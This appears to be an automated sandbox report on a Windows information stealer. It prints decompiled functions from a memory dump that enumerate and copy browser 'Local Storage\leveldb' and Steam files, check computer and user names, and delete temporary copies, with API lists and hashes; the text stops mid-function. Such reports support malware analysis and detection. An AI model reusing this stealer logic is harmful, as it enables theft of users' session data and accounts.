Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 4a1f497e4c53b448eab9437202b82cdfa75a24aae0332dee8f97c2aecef3c15e
Instruction ID: 9d7c848d5fa065b3018d15781046fbe79bf37ad442bbc5a522b9d0b8c36a2ae7
Opcode Fuzzy Hash: 4a1f497e4c53b448eab9437202b82cdfa75a24aae0332dee8f97c2aecef3c15e
Instruction Fuzzy Hash: FE01D4313002159BFB269F25EC04B6B7794AFAA772F00556BE816CA3A0DB7CCD00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042C4CA Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C4CA(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _t10;
				signed int _t16;

				_t20 = _a12;
				if(_a12 != 0) {
					_t16 = _a4;
					__eflags = _t16;
					if(__eflags == 0) {
						L4:
						 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x16;
						goto L9;
					} else {
						__eflags = _a8;
						if(__eflags > 0) {
							_t10 = E0042C400(0x431734, _t16, _a8, _a12, _a16, _a20); // executed
							__eflags = _t10;
							if(_t10 < 0) {
								 *_t16 = 0;
							}
							__eflags = _t10 - 0xfffffffe;
							if(__eflags == 0) {
								 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x22;
								L9:
								_t10 = E00431519() | 0xffffffff;
								__eflags = _t10;
							}
						} else {
							goto L4;
						}
					}
					return _t10;
				} else {
					 *((intOrPtr*)(E0042FC8F(_t20))) = 0x16;
					return E00431519() | 0xffffffff;
				}
			}

0x0042c4cf
0x0042c4d3
0x0042c4eb
0x0042c4ee
0x0042c4f0
0x0042c4f8
0x0042c4fd
0x00000000
0x0042c4f2
0x0042c4f2
0x0042c4f6
0x0042c517
0x0042c51f
0x0042c521
0x0042c523
0x0042c523
0x0042c526
0x0042c529
0x0042c530
0x0042c536
0x0042c53b
0x0042c53b
0x0042c53b
0x00000000
0x00000000
0x00000000
0x0042c4f6
0x0042c540
0x0042c4d5
0x0042c4da
0x0042c4e9
0x0042c4e9

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: c4ae8adf7e786eefa8cb483e7d1fb9324e14e6083575ca8835ce42ebe85d9e6f
Instruction ID: bbdd8debe46216ca519eddb9243fe3207bc28b160f90cf0b29bad1547182e567
Opcode Fuzzy Hash: c4ae8adf7e786eefa8cb483e7d1fb9324e14e6083575ca8835ce42ebe85d9e6f
Instruction Fuzzy Hash: 17F0D631600138AADF123FA6BC017AF3A94AF05338FC1026BF824462D1C778D850D7EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A220(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				int _t3;
				intOrPtr _t6;

				_t1 =  *0x453a18; // 0x25c1058
				_t2 = E0041EC70(__ebx, __edx, __edi, __esi); // executed
				_t3 = E0042CD30(_t2, _t1);
				if(_t3 == 0) {
					_t6 =  *0x453b80; // 0x25c1068
					_t3 = E0042CD30(E0041EDD0(), _t6);
					if(_t3 == 0) {
						ExitProcess(_t3);
					}
				}
				return _t3;
			}

0x0040a220
0x0040a226
0x0040a22c
0x0040a236
0x0040a238
0x0040a245
0x0040a24f
0x0040a252
0x0040a252
0x0040a24f
0x0040a258

APIs

Part of subcall function 0041EC70: GetComputerNameA.KERNEL32 ref: 0041EC9F

Part of subcall function 0041EDD0: GetUserNameA.ADVAPI32(?,?), ref: 0041EDFB

ExitProcess.KERNEL32 ref: 0040A252

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Name$ComputerExitProcessUser
String ID:
API String ID: 162832415-0
Opcode ID: b91ed37d4934e3e5d482740a829e4dd0885c8730538730b2825feafc6421f377
Instruction ID: f27bf2ecf34b88074da51086f20f31805b9bb7c69c62359edab30a757e25f947
Opcode Fuzzy Hash: b91ed37d4934e3e5d482740a829e4dd0885c8730538730b2825feafc6421f377
Instruction Fuzzy Hash: 48D017B9E1030066CE00B7B27D4AA1A220C699038B740097EB804E2242FA3DE9509AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004205C0 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004205C0(CHAR* _a4) {
				signed char _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				if(_t4 == 0xffffffff || (_t4 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x004205c7
0x004205d0
0x004205e2
0x004205d6
0x004205dc
0x004205dc

APIs

GetFileAttributesA.KERNEL32(0040B658,?,0040B658,?), ref: 004205C7

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7e042dabd07bde7e13204bbc4ab121a739db5c649a9472ba709e55c9d56f62bc
Instruction ID: ecbede4461bb4ebdd6143aae1aadc962acb7ae722cbe017c4b206bd6022c5f90
Opcode Fuzzy Hash: 7e042dabd07bde7e13204bbc4ab121a739db5c649a9472ba709e55c9d56f62bc
Instruction Fuzzy Hash: C8D0127221020C1ADA10DAACB84896773CC9B61334F804623F518D62D1EA75ECA18658

Uniqueness

Uniqueness Score: -1.00%

Function 00420590 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420590(WCHAR* _a4) {
				signed char _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				if(_t4 == 0xffffffff || (_t4 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00420597
0x004205a0
0x004205b2
0x004205a6
0x004205ac
0x004205ac

APIs

GetFileAttributesW.KERNEL32(?,?,0040AE8D,00000000,?,?,?,00000000,?,?,?,?,C21D6F0A), ref: 00420597

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a3aeb20cb939c8d3b5c5dde77c27553eed410ab04deacd6da8a31068224ccc06
Instruction ID: 07b3ac0cc64de7be559dd77f6fc8cc524232dc2570ccaa18cace522110fc807a
Opcode Fuzzy Hash: a3aeb20cb939c8d3b5c5dde77c27553eed410ab04deacd6da8a31068224ccc06
Instruction Fuzzy Hash: B6D012732112081EDA10D5FCB848957738D9B61330F804622F558C62D1E679E8E1865C

Uniqueness

Uniqueness Score: -1.00%

Function 004310C4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004310C4(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00430F84(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x004310c9
0x004310cb
0x004310cd
0x004310d0
0x004310d9

APIs

_doexit.LIBCMT ref: 004310D0

Part of subcall function 00430F84: __lock.LIBCMT ref: 00430F92
Part of subcall function 00430F84: RtlDecodePointer.NTDLL(0044D418,00000020,004310EB,0042C560,00000001,00000000,?,0043112B,000000FF,?,00433F52,00000011,0042C560,?,004323D1,0000000D), ref: 00430FCE
Part of subcall function 00430F84: DecodePointer.KERNEL32(?,0043112B,000000FF,?,00433F52,00000011,0042C560,?,004323D1,0000000D), ref: 00430FDF
Part of subcall function 00430F84: DecodePointer.KERNEL32(-00000004,?,0043112B,000000FF,?,00433F52,00000011,0042C560,?,004323D1,0000000D), ref: 00431005
Part of subcall function 00430F84: DecodePointer.KERNEL32(?,0043112B,000000FF,?,00433F52,00000011,0042C560,?,004323D1,0000000D), ref: 00431018
Part of subcall function 00430F84: DecodePointer.KERNEL32(?,0043112B,000000FF,?,00433F52,00000011,0042C560,?,004323D1,0000000D), ref: 00431022

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: DecodePointer$__lock_doexit
String ID:
API String ID: 3343572566-0
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: 63865a29c72a85b772939b1d9650269cdd59c5c97dc0691ec8f9c908dd0564df
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: 81B0923268020833DA302542AC03F8A7A0987C0B68E240021BA0C1D5A1A9A2B9618089

Uniqueness

Uniqueness Score: -1.00%

Function 00405F50 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F50(intOrPtr _a8, intOrPtr _a12) {
				void* _t4;

				_t4 = E0042CCE4(_a8, _a8, _a12); // executed
				return _t4;
			}

0x00405f5b
0x00405f64

APIs

_calloc.LIBCMT ref: 00405F5B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 536662ae7ed44f2b9759ddd656bfcab29adcb0657acb37c7779d76d8186f88c8
Instruction ID: 245a2c930fc78ba6dcff8d1e1c053c128305d6cd6a8a32248aec55d8d2a3a185
Opcode Fuzzy Hash: 536662ae7ed44f2b9759ddd656bfcab29adcb0657acb37c7779d76d8186f88c8
Instruction Fuzzy Hash: 7CB09BB555030C578604DE95AC41C6E335C6648514F404415FD1C47301D535F9108575

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416770 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 239stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004167AB
FindFirstFileA.KERNEL32(?,?), ref: 004167C2
StrCmpCA.SHLWAPI(?,004456B0), ref: 004167F5
StrCmpCA.SHLWAPI(?,004456AC), ref: 0041680F
_memset.LIBCMT ref: 0041682B
_memset.LIBCMT ref: 0041683E
lstrcat.KERNEL32(?,?), ref: 0041684E
lstrcat.KERNEL32(?,00443C68), ref: 00416860
lstrcat.KERNEL32(?,?), ref: 00416874
lstrcat.KERNEL32(?,00443C68), ref: 00416886
lstrcat.KERNEL32(?,025C1218), ref: 004168AF
lstrcat.KERNEL32(?,00443C68), ref: 004168C1
lstrcat.KERNEL32(?,00000003), ref: 004168CF
lstrcat.KERNEL32(?,00443C68), ref: 004168E1
lstrcat.KERNEL32(?,025C67D8), ref: 004168EF
lstrcat.KERNEL32(?,00443C68), ref: 00416901
lstrcat.KERNEL32(?,?), ref: 00416915
lstrcat.KERNEL32(?,00443C68), ref: 0041693B
lstrcat.KERNEL32(?,025C6C50), ref: 004169B3
lstrcat.KERNEL32(?,00443C68), ref: 004169C5
lstrcat.KERNEL32(?,?), ref: 004169D9
_memset.LIBCMT ref: 004169ED
lstrcat.KERNEL32(?,025C13D0), ref: 00416A02

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00416A1D
CopyFileA.KERNEL32(?,?,00000001), ref: 00416A33

Part of subcall function 004205F0: CreateFileA.KERNEL32(0040C2C0,80000000,00000003,00000000,00000003,00000080,00000000,?,0040C2C0,?), ref: 0042060D
Part of subcall function 004205F0: GetFileSizeEx.KERNEL32(00000000,?), ref: 0042061F
Part of subcall function 004205F0: CloseHandle.KERNEL32(00000000), ref: 0042062A

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00416A54
StrCmpCA.SHLWAPI(00000003,025C6D80,?), ref: 00416A69
StrCmpCA.SHLWAPI(00000003,025C7688), ref: 00416A80
DeleteFileA.KERNEL32(?), ref: 00416AB6
FindNextFileA.KERNEL32(?,?), ref: 00416ACA
FindClose.KERNEL32(?), ref: 00416ADF

Strings

%s\*, xrefs: 0041679F
Local Storage\leveldb, xrefs: 004169A7

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$File$Find_memset$Closewsprintf$CopyCountCreateDeleteFirstHandleNextSizeTickUnothrow_t@std@@@__ehfuncinfo$??2@_malloc_rand
String ID: %s\*$Local Storage\leveldb
API String ID: 24648945-1167967770
Opcode ID: 9b00a9ec5181185363e8b5cf8856950cad93ed70f90c965d0ea035f27d4d66ac
Instruction ID: 741edac61df7450db0a927aceaa77eb0017c3961b9e0f3b2dcce236247369e2b
Opcode Fuzzy Hash: 9b00a9ec5181185363e8b5cf8856950cad93ed70f90c965d0ea035f27d4d66ac
Instruction Fuzzy Hash: B39175B650031CABCB50EFA4EC88EDA7378BB99702F004999F545A3151EBB49BC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B190 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 147
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040B190(void* __ebx, intOrPtr _a4, intOrPtr _a24, intOrPtr _a32) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				char _v800;
				char _v1060;
				struct _WIN32_FIND_DATAA _v1380;
				char _v1384;
				void* _v1385;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t37;
				int _t44;
				int _t45;
				void* _t51;
				intOrPtr _t52;
				int _t55;
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t95;
				void* _t96;
				signed int _t97;
				void* _t98;
				void* _t100;

				_t69 = __ebx;
				_push(0xffffffff);
				_push(E0043DFF8);
				_push( *[fs:0x0]);
				_t36 =  *0x451f00; // 0xc21d6f0a
				_t37 = _t36 ^ _t97;
				_v20 = _t37;
				_push(_t37);
				 *[fs:0x0] =  &_v16;
				_t95 = _a32;
				_v8 = 0;
				_v1384 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
				wsprintfA( &_v800, "%s\\*", _t95);
				_t100 = _t98 - 0x55c + 0xc;
				_t84 =  &_v800;
				_t92 = FindFirstFileA( &_v800,  &_v1380);
				if(_t92 != 0xffffffff) {
					do {
						_t44 =  *0x464890( &(_v1380.cFileName), ".");
						__eflags = _t44;
						if(_t44 != 0) {
							_t55 =  *0x464890( &(_v1380.cFileName), "..");
							__eflags = _t55;
							if(_t55 != 0) {
								wsprintfA( &_v1060, "%s\\%s", _t95,  &(_v1380.cFileName));
								E0042A2F0( &_v280, 0, 0x104);
								_t59 =  *0x453978; // 0x25c13d0
								 *0x464860( &_v280, _t59);
								 *0x464860( &_v280, E00420520(_t92, __eflags, 0x1a));
								CopyFileA( &_v1060,  &_v280, 1);
								E0040AD50(__eflags,  &_v280, _v1384);
								_t100 = _t100 + 0x24;
								DeleteFileA( &_v280);
							}
						}
						_t45 = FindNextFileA(_t92,  &_v1380);
						__eflags = _t45;
					} while (_t45 != 0);
					FindClose(_t92);
					E0042A2F0( &_v540, 0, 0x104);
					_t72 =  *0x453b6c; // 0x25c8338
					 *0x464860( &_v540, _t72);
					_t51 =  *0x464758(_v1384);
					_t52 =  *0x453ca0; // 0x0
					_t84 =  &_v540;
					E00429620(_t52,  &_v540, _v1384, _t51);
					_t43 = E0042A2F0( &_v1384, 0, 4);
					_t100 = _t100 + 0x28;
					__eflags = _a24 - 0x10;
					if(_a24 < 0x10) {
						L10:
						 *[fs:0x0] = _v16;
						_pop(_t93);
						_pop(_t96);
						return E0042A36A(_t43, _t69, _v20 ^ _t97, _t84, _t93, _t96);
					}
					_t84 = _a4;
					_push(_a4);
					L9:
					_t43 = E0042A289();
					goto L10;
				}
				if(_a24 < 0x10) {
					goto L10;
				}
				_push(_a4);
				goto L9;
			}

0x0040b190
0x0040b193
0x0040b195
0x0040b1a0
0x0040b1a7
0x0040b1ac
0x0040b1ae
0x0040b1b3
0x0040b1b7
0x0040b1bd
0x0040b1c7
0x0040b1dc
0x0040b1ee
0x0040b1f4
0x0040b1fe
0x0040b20b
0x0040b210
0x0040b230
0x0040b23c
0x0040b242
0x0040b244
0x0040b256
0x0040b25c
0x0040b25e
0x0040b278
0x0040b28c
0x0040b291
0x0040b2a1
0x0040b2bc
0x0040b2d2
0x0040b2e6
0x0040b2eb
0x0040b2f5
0x0040b2f5
0x0040b25e
0x0040b303
0x0040b309
0x0040b309
0x0040b312
0x0040b326
0x0040b32b
0x0040b33c
0x0040b349
0x0040b356
0x0040b35c
0x0040b364
0x0040b374
0x0040b379
0x0040b37c
0x0040b380
0x0040b38e
0x0040b391
0x0040b399
0x0040b39a
0x0040b3a8
0x0040b3a8
0x0040b382
0x0040b385
0x0040b386
0x0040b386
0x00000000
0x0040b38b
0x0040b216
0x00000000
0x00000000
0x0040b21f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,C21D6F0A), ref: 0040B1CE
HeapAlloc.KERNEL32(00000000), ref: 0040B1D5
wsprintfA.USER32 ref: 0040B1EE
FindFirstFileA.KERNEL32(?,?), ref: 0040B205
StrCmpCA.SHLWAPI(?,004456B0), ref: 0040B23C
StrCmpCA.SHLWAPI(?,004456AC), ref: 0040B256
wsprintfA.USER32 ref: 0040B278
_memset.LIBCMT ref: 0040B28C
lstrcat.KERNEL32(?,025C13D0), ref: 0040B2A1
lstrcat.KERNEL32(?,00000000), ref: 0040B2BC
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B2D2
DeleteFileA.KERNEL32(?), ref: 0040B2F5
FindNextFileA.KERNEL32(00000000,?), ref: 0040B303
FindClose.KERNEL32(00000000), ref: 0040B312
_memset.LIBCMT ref: 0040B326
lstrcat.KERNEL32(?,025C8338), ref: 0040B33C
lstrlen.KERNEL32(?), ref: 0040B349
_memset.LIBCMT ref: 0040B374

Strings

%s\%s, xrefs: 0040B272
%s\*, xrefs: 0040B1E8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$Find_memsetlstrcat$Heapwsprintf$AllocCloseCopyDeleteFirstNextProcesslstrlen
String ID: %s\%s$%s\*
API String ID: 1936679341-2848263008
Opcode ID: 3f4b98f7ffb4a685eddd8896a666f1a21250abfe644a40c038c6c4b4377162ef
Instruction ID: 1033d88ce0b1ddfe797c3354967ac6c5d5f079e651a97d9bceb497e984fe8f71
Opcode Fuzzy Hash: 3f4b98f7ffb4a685eddd8896a666f1a21250abfe644a40c038c6c4b4377162ef
Instruction Fuzzy Hash: 9751A672900218AFCB14EF60DC49FDF7378EB89701F4045A9F605A3191EBB59A44CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409F60 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 94
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00409F60(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				struct _WIN32_FIND_DATAA _v1108;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t45;
				intOrPtr _t53;
				void* _t59;
				intOrPtr _t60;
				signed int _t61;
				void* _t62;
				void* _t63;

				_t45 = __ebx;
				_t22 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t22 ^ _t61;
				_t60 = _a4;
				wsprintfA( &_v788, "%s\\%s", _t60, _a8);
				_t63 = _t62 + 0x10;
				_t54 =  &_v788;
				_t59 = FindFirstFileA( &_v788,  &_v1108);
				if(_t59 == 0xffffffff) {
					L6:
					return E0042A36A(_t27, _t45, _v8 ^ _t61, _t54, _t59, _t60);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v1108.cFileName));
					if( *0x464890() != 0) {
						_push("..");
						_push( &(_v1108.cFileName));
						if( *0x464890() != 0) {
							E0042A2F0( &_v528, 0, 0x104);
							E0042A2F0( &_v268, 0, 0x104);
							 *0x464860( &_v528, "\\Soft\\Steam\\");
							 *0x464860( &_v528,  &(_v1108.cFileName));
							 *0x464860( &_v268, _t60);
							 *0x464860( &_v268, "\\");
							 *0x464860( &_v268,  &(_v1108.cFileName));
							_t53 =  *0x453ca0; // 0x0
							E004295D0(_t53,  &_v528,  &_v268);
							_t63 = _t63 + 0x24;
						}
					}
					_t54 =  &_v1108;
				} while (FindNextFileA(_t59,  &_v1108) != 0);
				_t27 = FindClose(_t59);
				goto L6;
			}

0x00409f60
0x00409f69
0x00409f70
0x00409f77
0x00409f89
0x00409f8f
0x00409f99
0x00409fa6
0x00409fab
0x0040a0a2
0x0040a0b1
0x00000000
0x00000000
0x00000000
0x00409fb1
0x00409fb1
0x00409fb1
0x00409fbc
0x00409fc5
0x00409fcb
0x00409fd6
0x00409fdf
0x00409ff3
0x0040a006
0x0040a01a
0x0040a02e
0x0040a03c
0x0040a04e
0x0040a062
0x0040a068
0x0040a07d
0x0040a082
0x0040a082
0x00409fdf
0x0040a085
0x0040a093
0x0040a09c
0x00000000

APIs

wsprintfA.USER32 ref: 00409F89
FindFirstFileA.KERNEL32(?,?), ref: 00409FA0
StrCmpCA.SHLWAPI(?,004456B0), ref: 00409FBD
StrCmpCA.SHLWAPI(?,004456AC), ref: 00409FD7
_memset.LIBCMT ref: 00409FF3
_memset.LIBCMT ref: 0040A006
lstrcat.KERNEL32(?,\Soft\Steam\), ref: 0040A01A
lstrcat.KERNEL32(?,?), ref: 0040A02E
lstrcat.KERNEL32(?,?), ref: 0040A03C
lstrcat.KERNEL32(?,00443C68), ref: 0040A04E
lstrcat.KERNEL32(?,?), ref: 0040A062
FindNextFileA.KERNEL32(00000000,?), ref: 0040A08D
FindClose.KERNEL32(00000000), ref: 0040A09C

Strings

\Soft\Steam\, xrefs: 0040A00E
%s\%s, xrefs: 00409F83

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Find$File_memset$CloseFirstNextwsprintf
String ID: %s\%s$\Soft\Steam\
API String ID: 2894742787-2995071678
Opcode ID: 9c3a97dfb9a7788ee0350d4825620e3af60ca01675d62c3476ad304b5976d38a
Instruction ID: 79c973c76b4094d621aef12eb933e47fcf98d24b998b0d35b1b3ee962456895d
Opcode Fuzzy Hash: 9c3a97dfb9a7788ee0350d4825620e3af60ca01675d62c3476ad304b5976d38a
Instruction Fuzzy Hash: 203176B660021CABDB10EB60EC48EEA73BCEB89701F404599F60593141EBB4AA84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004162F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416334
FindFirstFileA.KERNEL32(?,?), ref: 0041634B
StrCmpCA.SHLWAPI(?,004456B0), ref: 0041636C
StrCmpCA.SHLWAPI(?,004456AC), ref: 00416386
wsprintfA.USER32 ref: 004163AE
StrCmpCA.SHLWAPI(?,025C9E08), ref: 004163C4
StrCmpCA.SHLWAPI(?,025C9788), ref: 004163F8

Part of subcall function 00415AE0: _memset.LIBCMT ref: 00415B16
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,025C13D0), ref: 00415B2C
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,00000000), ref: 00415B47
Part of subcall function 00415AE0: CopyFileA.KERNEL32(?,?,00000001), ref: 00415B57
Part of subcall function 00415AE0: _memset.LIBCMT ref: 00415B6B
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,00443C68), ref: 00415B7F
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,025C6450), ref: 00415B93
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,00443C68), ref: 00415BA5
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,?), ref: 00415BB3
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,00445E84), ref: 00415BC5
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,?), ref: 00415BD3
Part of subcall function 00415AE0: lstrcat.KERNEL32(?,.txt), ref: 00415BE5
Part of subcall function 00415AE0: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00415C39
Part of subcall function 00415AE0: HeapAlloc.KERNEL32(00000000), ref: 00415C40

FindNextFileA.KERNEL32(?,?), ref: 004164D0
FindClose.KERNEL32(?), ref: 004164E5

Strings

%s\%s, xrefs: 004163A8
%s\*, xrefs: 00416328

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$FileFind$Heap_memsetwsprintf$AllocCloseCopyFirstNextProcess
String ID: %s\%s$%s\*
API String ID: 1524811457-2848263008
Opcode ID: 2cac1cd7956aabf67a26a9c7b9c72680866a7addf3161b45896cb0374f996646
Instruction ID: d02051e75da2c505a4cfd73cf83f51d6cb752d4473fc5ab21c83e38b1857ddf4
Opcode Fuzzy Hash: 2cac1cd7956aabf67a26a9c7b9c72680866a7addf3161b45896cb0374f996646
Instruction Fuzzy Hash: 9A519FB6900218ABCB25DFA4DC44EEB77BCFB89705F04419AF50A93251E674DB84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00406E10 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 479
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00406E10(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v268;
				char _v528;
				struct _SYSTEMTIME _v544;
				signed char _v545;
				signed char _v546;
				signed char _v547;
				signed char _v548;
				char _v550;
				char _v551;
				char _v552;
				char _v556;
				struct _FILETIME _v564;
				intOrPtr* _v568;
				struct _FILETIME _v576;
				struct _FILETIME _v584;
				unsigned int _v612;
				intOrPtr _v636;
				intOrPtr _v640;
				signed int _v648;
				unsigned int _v664;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t158;
				intOrPtr _t163;
				signed int _t167;
				char* _t169;
				signed int _t170;
				void* _t172;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				unsigned int _t182;
				signed char _t184;
				signed int _t186;
				long _t194;
				signed int _t201;
				signed char _t202;
				signed int _t218;
				signed int _t227;
				signed int _t247;
				signed int _t258;
				signed char _t267;
				signed int _t269;
				signed int _t275;
				intOrPtr _t299;
				void* _t305;
				intOrPtr _t306;
				signed char _t318;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				intOrPtr* _t344;
				intOrPtr* _t345;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr _t349;
				void* _t350;
				signed int _t352;
				void* _t353;
				void* _t354;
				void* _t355;
